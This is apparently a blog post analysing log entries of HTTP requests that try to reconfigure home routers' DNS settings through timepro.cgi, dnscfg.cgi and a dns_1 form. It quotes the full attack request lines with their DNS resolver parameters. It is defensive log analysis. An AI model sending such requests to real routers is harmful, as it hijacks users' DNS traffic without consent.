2022-09-01 Finding interesting requests for timepro.cgi in the logs
There are always attacks in the logs, but this one caught my eye because someone mentioned it, I saw it in logs and searching for a simple explanation for what I saw gave no answers. Those are the interesting ones. So here is the logline split into multiple parts in an attempt to make it more readable:"GET /cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save& sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=126.96.36.199& fdns_dynamic2=188.8.131.52&fdns_dynamic3=184.108.40.206& fdns_dynamic4=220.127.116.11&sdns_dynamic1=18.104.22.168& sdns_dynamic2=22.214.171.124&sdns_dynamic3=126.96.36.199& sdns_dynamic4=188.8.131.52&userid=&passwd=&mtu=1454& ip1=192&ip2=168&ip3=254&ip4=2& sm1=255&sm2=255&sm3=255&sm4=0& gw1=192&gw2=168&gw3=254&gw4=254& fdns1=&fdns2=&fdns3=&fdns4=& sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=150 HTTP/1.1"Searching for timepro.cgi finds a2004ns-mod/timepro.cgi at master · hklcf/a2004ns-mod · GitHub which seems to be compiled code: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped. Based on Honware: A virtual honeypot framework for capturing CPE and IoT zero days my best guess is that requests to timepro.cgi attempt to reconfigure a home router. And my next guess is that the attempt is to set the DNS resolvers to 184.108.40.206 and 220.127.116.11. Further searching finds another attempt from the same source IPv4 address which also looks a lot like an attempt to reconfigure DNS settings:"GET /dnscfg.cgi?dnsPrimary=18.104.22.168&dnsSecondary=22.214.171.124&dnsDynamic=0&dnsRefresh=1 HTTP/1.1"The theory that this is an attempt to redirect DNS traffic is somewhat confirmed by the fact that 126.96.36.199 indeed runs an open resolver which will give me answers. For the few things I have tried those are valid answers (no clear attempts to redirect traffic to other places). I get no answers from 188.8.131.52 at the moment. Update: Searching for the string 128.0.104 finds more:"POST /dnscfg.cgi?dnsPrimary=184.108.40.206&dnsSecondary=220.127.116.11&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" "POST /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=18.104.22.168&dnsSecondary=22.214.171.124 HTTP/1.1"Based on the names of the parameters I guess more of the same: attempts to redirect DNS traffic.